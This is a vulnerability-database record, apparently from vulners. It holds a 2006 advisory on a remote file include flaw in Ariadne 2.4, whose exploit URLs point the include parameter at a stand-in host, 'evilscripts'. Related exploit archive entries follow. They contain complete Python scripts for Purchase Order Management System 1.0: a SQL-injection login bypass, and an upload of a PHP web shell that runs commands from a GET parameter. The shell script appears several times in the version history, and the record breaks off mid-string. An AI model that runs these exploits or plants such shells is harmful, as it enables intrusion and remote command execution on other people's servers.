{"id": "SECURITYVULNS:DOC:14935", "bulletinFamily": "software", "title": "Ariadne v2.4 (store_config[code]) Remote File Include Vuln", "description": "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nAriadne v2.4 (store_config[code]) Remote File Include Vuln\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nFound: Cyber-Security.Org\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nVersion: 2.4\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nCode: include_once($store_config['code']."modules/mod_debug.php");\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nF.X:\r\n\r\n1- open files\r\n\r\n2- add this code before wrong codes\r\n\r\nrequire("../www/ariadne.inc");\r\n\r\n3- save files\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nExploit:\r\n\r\nwww.target.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://evilscripts ?\r\nwww.target.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://evilscripts ?\r\nwww.target.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://evilscripts ?\r\nwww.target.com/script_path/lib/includes/loader.web.php?store_config[code]=http://evilscripts ?\r\n\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nThanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\nScript Download: http://www.ariadne-cms.org/download/ariadne/ariadne.2.4.zip\r\n\r\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n", "published": "2006-11-05T00:00:00", "modified": "2006-11-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14935", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:20", "edition": 1, "viewCount": 28, "enchantments": {"score": {"value": 2.7, "vector": "NONE", "modified": "2018-08-31T11:10:20", "rev": 2}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "EULEROS_SA-2020-1299.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201299", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562311220201318", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "zdt", "idList": ["1337DAY-ID-34153", "1337DAY-ID-34159", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}, {"type": "kitploit", "idList": ["KITPLOIT:1907207623071471216"]}, {"type": "mssecure", "idList": ["MSSECURE:057ED5C1C386380F0F149DBAC7F1F6EF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156729"]}], "modified": "2018-08-31T11:10:20", "rev": 2}, "vulnersScore": 2.7}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"packetstorm": [{"id": "PACKETSTORM:164135", "hash": "452741197b58c2c8dc19f1152c8179be", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 Shell Upload", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164135/Purchase-Order-Management-System-1.0-Shell-Upload.html", "reporter": "Aryan Chehreghani", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-14T16:15:02", "history": [], "viewCount": 51, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-14T16:15:02", "rev": 2}, "score": {"value": -0.4, "vector": "NONE", "modified": "2021-09-14T16:15:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://packetstormsecurity.com/files/download/164135/poms10-shell.txt", "sourceData": "`# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload \n# Date: 2021-09-14 \n# Exploit Author: Aryan Chehreghani \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html \n# Version: v1.0 \n# Tested on: Windows 10 - XAMPP Server \n \n# [ About the Purchase Order Management System ] : \n#This Purchase Order Management System can store the list of all company's, \n#suppliers for easily retrieving the suppliers' data upon generating the purchase order. \n#It also stores the list of Items that the company possibly purchased from their suppliers. \n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request. \n \n#!/bin/env python3 \nimport requests \nimport time \nimport sys \nfrom colorama import Fore, Style \nif len(sys.argv) !=2: \nprint (''' \n########################################################### \n#Purchase Order Management System 1.0 - Remote File Upload# \n# BY:Aryan Chehreghani # \n# Team:TAPESH DIGITAL SECURITY TEAM IRAN # \n# mail:aryanchehreghani@yahoo.com # \n# -+-USE:python script.py <target url> # \n# [+]Example:python3 script.py http://127.0.0.1/ # \n########################################################### \n''') \nelse: \ntry: \nurl = sys.argv[1] \nprint() \nprint('[*] Trying to login...') \ntime.sleep(1) \nlogin = url + '/classes/Login.php?f=login' \npayload_name = \"shell.php\" \npayload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\" \nsession = requests.session() \npost_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"} \nuser_login = session.post(login, data=post_data) \ncookie = session.cookies.get_dict() \n \nif user_login.text == '{\"status\":\"success\"}': \nprint('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!') \nupload_url = url + \"/classes/Users.php?f=save\" \ncookies = cookie \nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"} \ndata = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\" \nprint('[*] Trying to shell...') \ntime.sleep(2) \n \ntry: \nprint('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!') \nupload = session.post(upload_url, headers=headers, cookies=cookie, data=data) \nupload_check = f'{url}/uploads' \nr = requests.get(upload_check) \nif payload_name in r.text: \n \npayloads = r.text.split('<a href=\"') \nfor load in payloads: \n \nif payload_name in load: \npayload = load.split('\"') \npayload = payload[0] \nelse: \npass \nelse: \nexit() \n \nexcept: \nprint (\"Upload failed try again\\n\") \nexit() \n \ntry: \nprint(\"Check Your Target ;)\\n\") \n \n \nexcept: \nprint(\"Failed to find shell\\n\") \n \nelse: \nprint(\"Login failed!\\n\") \n \nexcept: \nprint(\"Something Went Wrong!\\n\") \n \n######################################################### \n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"]}, {"id": "PACKETSTORM:164104", "hash": "035f0713c6b07fc96949112d5bb9e7b3", "type": "packetstorm", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection", "description": "", "published": "2021-09-09T00:00:00", "modified": "2021-09-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164104/POMS-PHP-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-10T05:12:49", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-10T05:12:49", "rev": 2}, "score": {"value": -0.0, "vector": "NONE", "modified": "2021-09-10T05:12:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://packetstormsecurity.com/files/download/164104/pompsphp10-sql.txt", "sourceData": "`### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote \nSQL-Injection-Bypass-Authentication. \n### Author: nu11secur1ty \n### Testing and Debugging: nu11secur1ty \n### Date: 09.09.2021 \n### Vendor: https://www.sourcecodester.com/user/257130/activity \n### Link: \nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form \n### CVE: CVE-nu11-09 \n \n[+] Exploit Source: \n \n#!/usr/bin/python \n# Author @nu11secur1ty \nimport time \nfrom selenium import webdriver \nfrom selenium.webdriver.chrome.options import Options \nfrom colorama import init, Fore, Back, Style \ninit(convert=True) \n \n \noptions = webdriver.ChromeOptions() \noptions.headless = True \ndriver = webdriver.Chrome(options=options) \n \nPoC = 'http://localhost/purchase_order/admin/login.php' \n \ndriver.get(PoC) \n \n#enter your login username \nusername=\"nu11secur1ty' or 1=1#\" \n \n#enter your login password \npassword=\"nu11secur1ty' or 1=1#\" \n \n# test the exploit username \n#username=\"test\" \n \n# test the exploit password \n#password=\"blavsdfdfaaa\" \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"password\" \n \ntry: \n### 0 \nusername_element = driver.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = driver.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \n \ntime.sleep(1) \ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary \nbtn-block\\\"]').click()\") \n \nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin \naccount is PWNED by SQL - Injection\\n') \nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your \nexploit is working =) BR @nu11secur1ty\\n') \nprint(Style.RESET_ALL) \n \ntime.sleep(3) \nS = lambda X: driver.execute_script('return \ndocument.body.parentNode.scroll'+X) \n \ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual \nadjustment \ndriver.find_element_by_tag_name('body').screenshot('poc.png') \n \ndriver.quit() \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Some error occured :(\") \n \n \n------------------------------------------------------------------ \n \n### Description: \nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote \nSQL-Injection-Bypass-Authentication for the admin account in app \n/purchase_order/classes/Login.php. \nremote SQL-Injection-Bypass-Authentication: \nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication. \n \nThe parameter (username) from the login form is not protected correctly and \nthere is no security and escaping from malicious payloads. \nWhen the user will sending a malicious query or malicious payload to the \nMySQL server, he can bypass the login credentials and take control of the \nadmin account. \n \n------------------------------------------------------------------- \n### CONCLUSION: This vendor must STOP creating all these broken projects \nand vulnerable software programs, probably he is not a developer! \n \n### BR \n- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration \nTesting Engineer \n \n------------------------------------------------------------------- \n### Reproduce: \nhttps://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09 \n### Proof: https://streamable.com/47kd87 \n### BR nu11secur1ty \n \n-- \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://www.exploit-db.com/ \nhttps://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.packetstorm.PacketstormBulletin"]}], "zdt": [{"id": "1337DAY-ID-36751", "hash": "d7da14c2c01209e6acf985ccaf3d503b", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-19T04:40:26", "history": [{"bulletin": {"id": "1337DAY-ID-36751", "hash": "641d19cdfafba1aae7ded88a15fab4ff", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-14T16:48:18", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-14T16:48:18", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "fb198dc7355eee80b436ade64e7e3a97", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-14T22:25:18", "history": [], "viewCount": 26, "enchantments": {}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-15] #"}, "lastseen": "2021-09-14T22:25:18", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "64cd0cac7780027536b28387c95e7a72", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-15T22:46:58", "history": [], "viewCount": 29, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-15T22:46:58", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-15T22:46:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find 